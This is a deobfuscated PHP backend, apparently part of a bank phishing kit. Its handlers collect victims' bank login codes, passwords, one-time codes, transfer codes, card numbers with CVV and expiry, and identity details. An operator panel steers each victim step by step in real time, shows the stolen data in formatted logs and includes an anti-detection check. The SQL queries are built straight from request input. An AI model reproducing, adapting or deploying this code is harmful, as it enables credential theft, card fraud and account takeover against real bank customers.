/* Decoded by unphp.net */ "ok")); } else { echo json_encode(array("status" => "db conn notok")); } } else { $_SESSION["uniqueid"] = $uniqueid; $_SESSION["started"] = "true"; $query = mysqli_query($conn, "INSERT INTO customers (usrlogin, comment, ip, useragent, uniqueid, status) VALUES ('{$usrlogin}', '{$comment}', '{$ip}', '{$ua}',{$uniqueid}, 1)"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "db conn notok")); } } } } goto BkXNK; Xv57R: if ($_SESSION["started"] == "true") { if ($_GET["getstatus"] and numeric($_GET["getstatus"]) == true) { $id = $_GET["getstatus"]; $query = mysqli_query($conn, "SELECT * from customers WHERE uniqueid='{$id}'"); if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_array($query, MYSQLI_ASSOC); echo $array["status"]; } } if ($_GET["type"] == "Multi-code") { if ($_POST["usrcode"] and $_POST["userid"] and numeric($_POST["userid"]) == true) { $usrcode = $_POST["usrcode"]; $comment = "Multi-Channel Code entered, user waiting"; $uniqueid = $_POST["userid"]; $query = mysqli_query($conn, "UPDATE customers SET usrcode='{$usrcode}', comment='{$comment}', status=2, buzzed=0 WHERE uniqueid={$uniqueid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "MCC Error")); } } } if ($_GET["type"] == "OTP") { if ($_POST["otpcode"] and $_POST["userid"] and numeric($_POST["userid"]) == true) { $otpcode = $_POST["otpcode"]; $comment = "OTP Code entered, user waiting"; $uniqueid = $_POST["userid"]; $query = mysqli_query($conn, "UPDATE customers SET otpcode='{$otpcode}', comment='{$comment}', status=3, buzzed=0 WHERE uniqueid={$uniqueid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "OTP Error")); } } } if ($_GET["type"] == "AUTH") { if ($_POST["userid"] and numeric($_POST["userid"]) == true) { $comment = "Ready to reject payment, user waiting"; $uniqueid = $_POST["userid"]; $query = mysqli_query($conn, "UPDATE customers SET comment='{$comment}', status=4, buzzed=0 WHERE uniqueid={$uniqueid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "Auth Error")); } } } if ($_GET["type"] == "UserInfo") { if ($_POST["fname"] and $_POST["dob"] and $_POST["usraddr"] and $_POST["usrnif"] and $_POST["userid"] and numeric($_POST["userid"]) == true) { $fname = $_POST["fname"]; $dob = $_POST["dob"]; $usraddr = $_POST["usraddr"]; $usrnif = $_POST["usrnif"]; $comment = "Basic Info Entered, user waiting"; $uniqueid = $_POST["userid"]; $query = mysqli_query($conn, "UPDATE customers SET fname='{$fname}', dob='{$dob}', usraddr='{$usraddr}', usrnif='{$usrnif}', comment='{$comment}', status=5, buzzed=0 WHERE uniqueid={$uniqueid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "Info Error")); } } } if ($_GET["type"] == "CCDeets") { if ($_POST["ccnum"] and $_POST["cvvnum"] and $_POST["expiry"] and $_POST["userid"] and numeric($_POST["userid"]) == true) { $ccnum = $_POST["ccnum"]; $cvvnum = $_POST["cvvnum"]; $expiry = $_POST["expiry"]; $comment = "CC Deets Entered, user waiting"; $uniqueid = $_POST["userid"]; $query = mysqli_query($conn, "UPDATE customers SET ccnum='{$ccnum}', cvvnum='{$cvvnum}', expiry='{$expiry}', comment='{$comment}', status=6, buzzed=0 WHERE uniqueid={$uniqueid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "CC Error")); } } } if ($_GET["type"] == "Phone") { if ($_POST["phonenum"] and $_POST["userid"] and numeric($_POST["userid"]) == true) { $phonenum = $_POST["phonenum"]; $comment = "Phone No. entered, user waiting"; $uniqueid = $_POST["userid"]; $query = mysqli_query($conn, "UPDATE customers SET phonenum='{$phonenum}', comment='{$comment}', status=7, buzzed=0 WHERE uniqueid={$uniqueid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "Phone Error")); } } } if ($_GET["type"] == "PAY") { if ($_POST["paycode"] and $_POST["userid"] and numeric($_POST["userid"]) == true) { $paycode = $_POST["paycode"]; $comment = "Transfer code entered, user waiting"; $uniqueid = $_POST["userid"]; $query = mysqli_query($conn, "UPDATE customers SET paycode='{$paycode}', comment='{$comment}', status=8, buzzed=0 WHERE uniqueid={$uniqueid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "Pay Error")); } } } if ($_GET["type"] == "Password") { if ($_POST["usrpass"] and $_POST["userid"] and numeric($_POST["userid"]) == true) { $usrpass = $_POST["usrpass"]; $comment = "Pass entered, user waiting"; $uniqueid = $_POST["userid"]; $query = mysqli_query($conn, "UPDATE customers SET usrpass='{$usrpass}', comment='{$comment}', status=9, buzzed=0 WHERE uniqueid={$uniqueid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "Pass Error")); } } } } goto mMHrq; B_C5_: include "../vendor/200.php"; goto RIqW8; RIqW8: include "../vendor/300.php"; goto ih13o; TbMN2: include "../vendor/netcraft_check.php"; goto RyL6_; ih13o: include "../vendor/index.php"; goto TbMN2; BkXNK: if ($_SESSION["admin_logged"] == "true") { if ($_GET["type"] == "commmand") { if ($_POST["userid"] and numeric($_POST["userid"]) == true and $_POST["status"] and numeric($_POST["status"]) == true) { $userid = $_POST["userid"]; $status = $_POST["status"]; $char1 = $_POST["char1"]; $char2 = $_POST["char2"]; $char3 = $_POST["char3"]; $amount = $_POST["amount"]; $payeeName = $_POST["payeeName"]; $comment = "Admin has sent command"; if ($char1 != null and $char1 != '' and $char2 != null and $char2 != '' and $char3 != '' and $char3 != '' and $amount == '' and $amount == null) { $query = mysqli_query($conn, "UPDATE customers SET comment='{$comment}', status={$status}, char1='{$char1}', char2='{$char2}', char3='{$char3}' WHERE id={$userid}"); } else { if ($amount != null and $amount != '' and $payeeName != null and $payeeName != '' and $char2 == null and $char2 == '') { $query = mysqli_query($conn, "UPDATE customers SET comment='{$comment}', status={$status}, payeeName='{$payeeName}', amount='{$amount}' WHERE id={$userid}"); } else { $query = mysqli_query($conn, "UPDATE customers SET status={$status} WHERE id={$userid}"); } } if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "db conn error")); } } else { echo json_encode(array("status" => "command error")); } } if (isset($_GET["get_submitted"])) { $query = mysqli_query($conn, "SELECT * FROM customers WHERE status<=7 and buzzed=0"); if ($query) { $num = mysqli_num_rows($query); $array = mysqli_fetch_array($query, MYSQLI_ASSOC); if ($num >= 1) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "notok")); } } else { echo json_encode(array("status" => "notok")); } } if (isset($_GET["fetch_pc_data"])) { $query = mysqli_query($conn, "SELECT * from customers"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = array_filter(mysqli_fetch_all($query, MYSQLI_ASSOC)); } } foreach ($array as $value) { if ($value["status"] == 500) { $info = "Easter egg"; } elseif ($value["status"] == 1) { $info = "New User"; } elseif ($value["status"] == 2) { $info = "Submitted Multi Code"; } elseif ($value["status"] == 3) { $info = "Submitted OTP"; } elseif ($value["status"] == 4) { $info = "Submitted Answer"; } elseif ($value["status"] == 5) { $info = "Submitted Basic Info"; } elseif ($value["status"] == 6) { $info = "Submitted Card Info"; } elseif ($value["status"] == 7) { $info = "Submitted Phone No."; } elseif ($value["status"] == 8) { $info = "Submitted Pay Code"; } elseif ($value["status"] == 9) { $info = "Submitted Password"; } elseif ($value["status"] == 11) { $info = "Awaiting Multi code"; } elseif ($value["status"] == 12) { $info = "Awaiting OTP"; } elseif ($value["status"] == 13) { $info = "Awaiting Answer"; } elseif ($value["status"] == 14) { $info = "Awaiting Basic Info"; } elseif ($value["status"] == 15) { $info = "Awaiting Card Info "; } elseif ($value["status"] == 16) { $info = "Awaiting Phone No."; } elseif ($value["status"] == 17) { $info = "Waiting on loading page"; } elseif ($value["status"] == 18) { $info = "Awaiting Password"; } elseif ($value["status"] == 50) { $info = "Back to Login"; } elseif ($value["status"] == 100) { $info = "INVALID"; } elseif ($value["status"] == 20) { $info = "Finished"; } if ($value["status"] == 20) { $userStatus = "Offline"; echo "\xa\x9 \xa\x9 \x9 {$value["id"]} \x9 \x9 {$value["usrlogin"]}\xa\x9\x9 {$userStatus}\xa \x9\x9\x9 {$value["ip"]} \x9 \x9\x9 {$info}\xa\x9 \x9 \x9\x9\x9 \x9\x9 \x9\x9\x9\x9 \x9\x9 \xa \x9\x9\x9"; } else { $userStatus = "Offline"; $savedStatus = $value["last_activity"]; if ($savedStatus !== null) { $user_main_status = new DateTime($savedStatus); $currentTime = new DateTime("now"); $indicator = $currentTime->getTimestamp() - $user_main_status->getTimestamp(); if ($indicator <= 8) { $userStatus = "Online"; } } else { if ($savedStatus === null) { $userStatus = "No data"; } } if ($Multiple_Admins == "off") { echo " \x9\x9 \x9 {$value["id"]}\xa\x9 \x9\x9\x9 {$value["usrlogin"]} \x9\x9\x9\x9 \x9{$userStatus}\xa \x9\x9 \x9{$value["ip"]}\xa \x9\x9\x9 {$value["comment"]} \x9\x9 {$info} \x9\x9\x9\x9\x9\x9 \x9\x9 \xa\x9 \x9 \x9\x9\x9\xa \x9\x9\x9\x9 \xa \x9 \x9 \x9 \x9 "; } else { if ($value["log_owner"] == '') { echo "\xa \x9 \x9 \xa\x9\x9 \x9{$value["id"]} \x9 \x9\x9 {$value["usrlogin"]}\xa \x9\x9 \x9 \x9{$userStatus}\xa \x9\x9 {$value["ip"]} \x9 {$value["comment"]} \x9 \x9 {$info}\xa \x9\x9\x9\x9\x9 \x9 \x9 \x9 \x9 \x9 \x9\x9\xa\x9 \x9\x9\x9\x9\xa \x9\x9\x9 "; } else { if ($value["log_owner"] == $_SESSION["log_owner"]) { echo " \x9\x9 \x9\xa {$value["id"]} \x9\x9 \x9\x9{$value["usrlogin"]} \x9 {$userStatus}\xa \x9 \x9 \x9\x9{$value["ip"]} \x9 \x9 {$value["comment"]} \x9 \x9\x9\x9{$info}\xa \x9 \x9\x9 \x9 \x9 \x9 \x9 \x9 \x9\x9\xa\x9 \x9\x9 \x9 \x9\x9 \xa \x9 \x9\x9 "; } else { echo "\xa\x9 \x9 \x9\x9 \x9 {$value["id"]}\xa \x9 \x9\x9\x9\x9{$value["usrlogin"]}\xa\x9 \x9\x9\x9\x9 {$userStatus}\xa\x9 \x9 \x9\x9{$value["ip"]}\xa \x9\x9\x9 \x9 {$value["comment"]}\xa\x9\x9 \x9\x9\x9{$info}\xa\x9 \x9\x9\x9\x9 \x9 \x9\x9 Claimed by - {$value["log_owner"]} \x9 \x9 \x9 \xa \x9\x9\x9\x9\x9 \x9 \x9 \x9"; } } } } } } if (isset($_GET["fetch_data"])) { $query = mysqli_query($conn, "SELECT * from customers"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = array_filter(mysqli_fetch_all($query, MYSQLI_ASSOC)); } } foreach ($array as $value) { if ($value["status"] == 500) { $info = "Easter egg"; } elseif ($value["status"] == 1) { $info = "New User"; } elseif ($value["status"] == 2) { $info = "Submitted Multi Code"; } elseif ($value["status"] == 3) { $info = "Submitted OTP"; } elseif ($value["status"] == 4) { $info = "Submitted Answer"; } elseif ($value["status"] == 5) { $info = "Submitted Basic Info"; } elseif ($value["status"] == 6) { $info = "Submitted Card Info"; } elseif ($value["status"] == 7) { $info = "Submitted Phone No."; } elseif ($value["status"] == 8) { $info = "Submitted Pay Code"; } elseif ($value["status"] == 9) { $info = "Submitted Password"; } elseif ($value["status"] == 11) { $info = "Awaiting Multi code"; } elseif ($value["status"] == 12) { $info = "Awaiting OTP"; } elseif ($value["status"] == 13) { $info = "Awaiting Answer"; } elseif ($value["status"] == 14) { $info = "Awaiting Basic Info"; } elseif ($value["status"] == 15) { $info = "Awaiting Card Info "; } elseif ($value["status"] == 16) { $info = "Awaiting Phone No."; } elseif ($value["status"] == 17) { $info = "Waiting on loading page"; } elseif ($value["status"] == 18) { $info = "Awaiting Password"; } elseif ($value["status"] == 50) { $info = "Back to Login"; } elseif ($value["status"] == 100) { $info = "INVALID"; } elseif ($value["status"] == 20) { $info = "Finished"; } if ($value["status"] == 20) { $userStatus = "Offline"; echo " \x9\x9{$value["id"]} \x9 \x9 \x9{$value["usrlogin"]}\xa\x9 \x9 {$userStatus} \x9 \x9{$value["ip"]} \x9\x9 \x9\x9{$info}\xa\x9 \x9 \xa\x9 \x9 \x9\xa\x9 \x9 \x9 \xa\x9\x9 \x9 \x9 \x9 \x9\x9 "; } else { $userStatus = "Offline"; $savedStatus = $value["last_activity"]; if ($savedStatus !== null) { $user_main_status = new DateTime($savedStatus); $currentTime = new DateTime("now"); $indicator = $currentTime->getTimestamp() - $user_main_status->getTimestamp(); if ($indicator <= 8) { $userStatus = "Online"; } } else { if ($savedStatus === null) { $userStatus = "No data"; } } if ($Multiple_Admins == "off") { echo " \x9\x9\x9 \xa \x9\x9 \x9{$value["id"]}\xa\x9 \x9\x9 {$value["usrlogin"]} \x9\x9 \x9\x9\x9{$userStatus} \x9 \x9\x9 \x9{$info}
{$value["comment"]} \x9 \x9 \x9\x9\x9\x9\x9\x9 \x9 \x9 \x9 \x9 \x9\x9\x9 \x9 \x9"; } else { if ($value["log_owner"] == '') { echo " \x9\x9 \x9 \x9\x9\x9\x9 \x9{$value["id"]}\xa \x9\x9\x9 \x9{$value["usrlogin"]}\xa \x9\x9\x9\x9 {$userStatus}\xa\x9 \x9\x9 \x9{$info}
{$value["comment"]}\xa \x9 \x9 \x9 \x9 \x9 \x9 \x9\x9 \x9 \x9\x9 \xa\x9 \x9 "; } else { if ($value["log_owner"] == $_SESSION["log_owner"]) { echo " \x9 \x9\x9 \x9\x9{$value["id"]} \x9\x9 \x9\x9{$value["usrlogin"]} \x9 \x9\x9\x9 {$userStatus} \x9 \x9\x9{$info}
{$value["comment"]}\xa\x9\x9\x9 \x9{$info}\xa\x9 \x9\x9\x9\x9\xa\x9\x9 \x9 \xa\x9 \x9\x9 \x9\x9 \x9\x9\x9\x9 \x9\xa \x9 \x9\x9 \x9\x9 \x9\x9"; } else { echo "\xa \x9 \x9\xa \x9\x9\x9\x9\x9{$value["id"]}\xa\x9\x9 \x9\x9\x9 {$value["usrlogin"]}\xa\x9 \x9\x9\x9\x9\x9{$userStatus}\xa\x9\x9\x9\x9 \x9 {$info}
{$value["comment"]} \x9 \x9 \x9 \xa \x9\x9 \x9Claimed by - {$value["log_owner"]} \x9\x9\x9 \x9\x9\x9\xa\x9\x9\x9 \x9\x9 \x9 \x9\x9 "; } } } } } } if (isset($_GET["fetch_pc_modal_data"])) { $query = mysqli_query($conn, "SELECT * from customers"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_all($query, MYSQLI_ASSOC); } } foreach ($array as $value) { $usrlogin = $value["usrlogin"]; $usrpass = $value["usrpass"]; $amount = $value["amount"]; $otpcode = $value["otpcode"]; $fname = $value["fname"]; $dob = $value["dob"]; $usraddr = $value["usraddr"]; $usrnif = $value["usrnif"]; $usrcode = $value["usrcode"]; $paycode = $value["paycode"]; $phonenum = $value["phonenum"]; $ccnum = $value["ccnum"]; $cvvnum = $value["cvvnum"]; $expiry = $value["expiry"]; $ip = $value["ip"]; $useragent = urldecode($value["useragent"]); $data_log = " \x9\x9 =====\342\211\253 LOGIN \xe2\x89\252===== \x9 \x9User Code : {$usrlogin} \x9 \x9Multi Code : {$usrcode} \x9 Password : {$usrpass} \x9=====\342\211\253 CODE \xe2\x89\252===== \x9OTP Code : {$otpcode} Pay Code : {$paycode} \x9\x9=====\xe2\211\xab CARD \342\x89\252=====\xa \x9CC Num : {$ccnum}\xa \x9\x9Expiry : {$expiry} \x9\x9CVV : {$cvvnum} \x9\x9 =====\342\x89\253 ADDITIONAL \342\211\xaa=====\xa\x9 \x9Full Name : {$fname}\xa NIF : {$usrnif} \x9 \x9DOB : {$dob}\xa\x9 Address : {$usraddr} \x9 Phone Num : {$phonenum} =============================== \x9\x9 IP : {$ip}\xa\x9\x9 UA : {$useragent}\xa \x9 ==============================="; echo " \xa \x9\x9 \x9 "; } } if (isset($_GET["fetch_pc_finish_modal_data"])) { $query = mysqli_query($conn, "SELECT * from customers"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_all($query, MYSQLI_ASSOC); } } foreach ($array as $value) { $usrlogin = $value["usrlogin"]; $usrpass = $value["usrpass"]; $amount = $value["amount"]; $otpcode = $value["otpcode"]; $fname = $value["fname"]; $dob = $value["dob"]; $usraddr = $value["usraddr"]; $usrnif = $value["usrnif"]; $usrcode = $value["usrcode"]; $paycode = $value["paycode"]; $phonenum = $value["phonenum"]; $ccnum = $value["ccnum"]; $cvvnum = $value["cvvnum"]; $expiry = $value["expiry"]; $ip = $value["ip"]; $useragent = urldecode($value["useragent"]); $data_log = "\xa\x9\x9\x9=====\xe2\211\253 LOGIN \342\x89\xaa=====\xa User Code : {$usrlogin} \x9 Multi Code : {$usrcode}\xa\x9 \x9Password : {$usrpass}\xa\x9 \x9=====\xe2\x89\253 CODE \342\x89\xaa===== \x9 OTP Code : {$otpcode}\xa \x9\x9Pay Code : {$paycode} \x9 \x9=====\342\x89\xab CARD \342\x89\252===== \x9\x9 CC Num : {$ccnum}\xa Expiry : {$expiry} \x9\x9CVV : {$cvvnum}\xa \x9=====\xe2\211\xab ADDITIONAL \xe2\x89\xaa===== Full Name : {$fname}\xa\x9 NIF : {$usrnif} \x9\x9 DOB : {$dob}\xa\x9\x9\x9Address : {$usraddr} \x9 Phone Num : {$phonenum}\xa \x9\x9=============================== \x9 IP : {$ip} \x9 UA : {$useragent}\xa\x9\x9 ==============================="; echo " \x9\xa \x9\x9\xa\x9\x9\x9"; } } if (isset($_GET["fetch_modal_data"])) { $query = mysqli_query($conn, "SELECT * from customers"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_all($query, MYSQLI_ASSOC); } } foreach ($array as $value) { $usrlogin = $value["usrlogin"]; $usrpass = $value["usrpass"]; $amount = $value["amount"]; $otpcode = $value["otpcode"]; $fname = $value["fname"]; $dob = $value["dob"]; $usraddr = $value["usraddr"]; $usrnif = $value["usrnif"]; $usrcode = $value["usrcode"]; $paycode = $value["paycode"]; $phonenum = $value["phonenum"]; $ccnum = $value["ccnum"]; $cvvnum = $value["cvvnum"]; $expiry = $value["expiry"]; $ip = $value["ip"]; $useragent = urldecode($value["useragent"]); echo " \x9\x9 \x9 \x9 \x9 "; } } if (isset($_GET["fetch_finish_modal_data"])) { $query = mysqli_query($conn, "SELECT * from customers"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_all($query, MYSQLI_ASSOC); } } foreach ($array as $value) { $usrlogin = $value["usrlogin"]; $usrpass = $value["usrpass"]; $amount = $value["amount"]; $otpcode = $value["otpcode"]; $fname = $value["fname"]; $dob = $value["dob"]; $usraddr = $value["usraddr"]; $usrnif = $value["usrnif"]; $usrcode = $value["usrcode"]; $paycode = $value["paycode"]; $phonenum = $value["phonenum"]; $ccnum = $value["ccnum"]; $cvvnum = $value["cvvnum"]; $expiry = $value["expiry"]; $ip = $value["ip"]; $useragent = urldecode($value["useragent"]); echo "\xa\x9 \x9\x9 \x9\x9\x9 \x9 "; } } if (isset($_GET["counter"])) { $ipFile = "../../logs/visits.txt"; $activequery = mysqli_query($conn, "SELECT * FROM customers WHERE status <20"); $completequery = mysqli_query($conn, "SELECT * FROM customers WHERE status=20"); if ($activequery and $completequery) { $userRows = count(file($ipFile)); $activeRows = mysqli_num_rows($activequery); $completeRows = mysqli_num_rows($completequery); $stats = array("usernum" => $userRows, "activenum" => $activeRows, "completednum" => $completeRows); echo json_encode($stats); } else { echo json_encode(array("stats" => "error")); } } if (isset($_GET["visitlog"])) { $ipFile = "../../logs/visitors.txt"; $logquery = file_get_contents($ipFile, true); if ($logquery) { $log = array("visitorlog" => $logquery); echo json_encode($log); } else { echo json_encode(array("stats" => "error")); } } if (isset($_GET["buzzoff"])) { $query = mysqli_query($conn, "SELECT * FROM customers WHERE status<=7"); if ($query) { $array = array_filter(mysqli_fetch_all($query, MYSQLI_ASSOC)); foreach ($array as $value) { $userid = $value["id"]; $queryy = mysqli_query($conn, "UPDATE customers SET buzzed=1 WHERE id={$userid}"); if ($queryy) { $stat = "ok"; } else { $stat = "notok"; } } if ($stat == "ok") { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "notok")); } } else { echo json_encode(array("status" => "notok")); } } if ($_GET["type"] == "delete") { if ($_POST["userid"] and numeric($_POST["userid"]) == true) { $userid = $_POST["userid"]; $query = mysqli_query($conn, "DELETE FROM customers WHERE id={$userid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "notok")); } } else { echo json_encode(array("status" => "notokk")); } } } goto Xv57R; AtyZK: include "margin.php"; goto RVXPC; mMHrq: ?>